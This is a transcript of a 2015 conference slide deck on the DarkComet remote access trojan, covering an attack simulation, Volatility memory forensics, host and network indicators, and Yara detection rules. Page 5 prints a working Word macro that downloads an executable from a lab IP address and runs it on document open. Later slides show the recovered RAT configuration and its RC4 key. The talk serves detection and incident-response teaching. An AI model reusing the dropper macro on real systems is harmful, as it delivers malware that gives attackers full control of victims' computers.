Top Banner
DarkComet Blackhat Tyler Halfpop, Fidelis Cybersecurity
17

DarkComet Blackhat Presentation 2015_08_05

Aug 19, 2015

Download

Technology

Tyler Halfpop
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: DarkComet Blackhat Presentation 2015_08_05

DarkCometBlackhat

Tyler Halfpop, Fidelis Cybersecurity

Page 2: DarkComet Blackhat Presentation 2015_08_05

$ whoami

• Threat Researcher for Fidelis CyberSecurity• Working on doctorate in computer science• SANS Lethal Forensicator• CISSP, GREM• Site: tylerhalfpop.com | Twitter: @tylerhalfpop

Page 3: DarkComet Blackhat Presentation 2015_08_05

About This Talk

• DarkComet at 100mph• What?• How?• Response

DarkComet About Screen

Page 4: DarkComet Blackhat Presentation 2015_08_05

DarkComet About

Names: DarkComet, DarkKomet, Fynlos, FynloskiFully featured RAT written in Delphi

Page 5: DarkComet Blackhat Presentation 2015_08_05

Attack Simulation

Word Doc with Macro

Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")xHttp.Open "GET", "http://192.168.66.254/bad.exe", FalsexHttp.Send

With bStrm .Type = 1 .Open .write xHttp.responseBody .savetofile "bad.exe", 2End With

Shell ("bad.exe")

End Sub

Page 6: DarkComet Blackhat Presentation 2015_08_05

Attack Simulation Build Video

• Build the downloader• Build the DarkComet implant• Setup the Client Listener

Page 7: DarkComet Blackhat Presentation 2015_08_05

Attack Simulation Video

• Victim opens the word document• Downloads and executes the downloader• Downloader downloads and executes the DarkComet RAT• RAT controller has full control of the victim system

Page 8: DarkComet Blackhat Presentation 2015_08_05
Page 9: DarkComet Blackhat Presentation 2015_08_05
Page 10: DarkComet Blackhat Presentation 2015_08_05

Memory Forensics with Volatility

python vol.py -f /vt/demo/WIN-JN4BO8C9KHA-20150401-214850.raw --profile=Win7SP1x86 psxviewVolatility Foundation Volatility Framework 2.4Offset(P) Name PID pslist psscan thrdproc pspcid csrss session deskthrd ---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- 0x3fd6ca58 svchost.exe 3348 True True True True True True True 0x3e659030 OSPPSVC.EXE 4060 True True True True True True True 0x3fa5f488 DumpIt.exe 2888 True True True True True True True 0x3e8db030 lsass.exe 496 True True True True True True False 0x3e6ea030 vmtoolsd.exe 1536 True True True True True True True 0x3fdba8a8 sppsvc.exe 3304 True True True True True True True 0x3e6670f0 spoolsv.exe 1284 True True True True True True True 0x3e8dc9b0 lsm.exe 504 True True True True True True False 0x3e963688 svchost.exe 616 True True True True True True True 0x3e475d40 conhost.exe 708 True True True True True True True 0x3e8a4848 winlogon.exe 428 True True True True True True True 0x3fa51030 msdcsc.exe 3384 True True True True True True True 0x3e473a78 TPAutoConnect. 644 True True True True True True True 0x3f27fd40 csrss.exe 392 True True True True False True True 0x3f264030 csrss.exe 344 True True True True False True True 0x3f2f2d40 smss.exe 252 True True True True False False False 0x3fffa9e8 System 4 True True True True False False False

Page 11: DarkComet Blackhat Presentation 2015_08_05

Memory Forensics with Volatility

python vol.py -f /vt/demo/WIN-JN4BO8C9KHA-20150401-214850.raw --profile=Win7SP1x86 memdump -p 3384 --dump-dir /vt/demo/Volatility Foundation Volatility Framework 2.4************************************************************************Writing msdcsc.exe [ 3384] to 3384.dmp

Page 12: DarkComet Blackhat Presentation 2015_08_05

Memory Forensics with Volatility

strings -a /vt/demo/3384.dmp | less…#BEGIN DARKCOMET DATA --MUTEX={DC_MUTEX-C8LPD3P}SID={Guest16}FWB={0}NETDATA={192.168.66.10:1604}GENCODE={U69tAi8fwsqT}INSTALL={1}COMBOPATH={7}EDTPATH={MSDCSC\msdcsc.exe}KEYNAME={MicroUpdate}EDTDATE={16/04/2007}PERSINST={0}MELT={0}CHANGEDATE={0}DIRATTRIB={0}FILEATTRIB={0}FAKEMSG={1}MSGTITLE={Don't Worry}MSGCORE={49742773206E6F2070726F626C656D210D0A}MSGICON={64}OFFLINEK={1}#EOF DARKCOMET DATA –…#KCMDDC51#-890

Page 13: DarkComet Blackhat Presentation 2015_08_05

python -c "from Crypto.Cipher import ARC4; print ARC4.new(\"#KCMDDC51#-890\").decrypt(\"BF7CAB464EFB\".decode('hex'))"

IDTYPE

Page 14: DarkComet Blackhat Presentation 2015_08_05

Host Detections

Default Mutex: DC_MUTEX-[A-Z0-9]{7}Default Dropped File: *\MSDCSC\msdcsc.exeKeylog Files: %TMP%/dclogs/YYYY-MM-DD-#.dc

Registry Persistence: HKCU/Software/Microsoft/Windows/CurrentVersion/Run/HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Hidden iexplorer.exe processes with no visible parent processHost file changes

5.4 Legacy Server Module has a visible GUI and system tray icon

Page 15: DarkComet Blackhat Presentation 2015_08_05

Yara Rules

rule DarkComet{

meta:description = "DarkComet RAT"author = "Fidelis Cybersecurity"date = "2015-07-22"

strings:$s1 = "#KCMDDC"$s2 = "DCDATA"$s3 = "#BOT#CloseServer"$s4 = "#BOT#SvrUninstall"$s5 = "#BOT#URLDownload"

condition:uint16(0) == 0x5a4d and filesize < 50MB and all of ($s*)

}rule DarkCometDownloader {

meta:description = "DarkComet RAT"author = "Fidelis Cybersecurity"date = "2015-07-22"

strings:$s1 =

{6A00FF15F0304000A30D1040006A0A68261040006A00FF15F4304000A311104000FF35111040006A00FF15F8304000A315104000FF35111040006A00FF15FC304000A319104000FF3515104000FF1500314000A31D104000FF3519104000FF351D104000682C114000FF1508314000FF3515104000FF150C31400031C0682C104000682C104000FF15143140006805104000682C104000FF1510314000682C104000FF15183140006A006A00682C104000682C1140006A00FF15803040006A056A006A00682C10400068001040006A00FF15A83040006A00FF1504314000}

condition:uint16(0) == 0x5a4d and filesize < 10KB and all of them

}

Page 16: DarkComet Blackhat Presentation 2015_08_05

Network Detections

Default Port: 1604 TCPDynamic DNS: No-IP.comDefault Banners:

8EA4AB05FA7EB47CB892B702C7CF9C7CD932155CAD31A61F1164805C82EEBF7CAB464EFB

Check for regular beaconing and inspect FTP Traffic because the keylogger can be configured to deliver data over FTP.

Page 17: DarkComet Blackhat Presentation 2015_08_05

QUESTIONS?THANK YOU

[email protected]

@tylerhalfpop tylerhalfpop.com | @FidSecSys fidelissecurity.com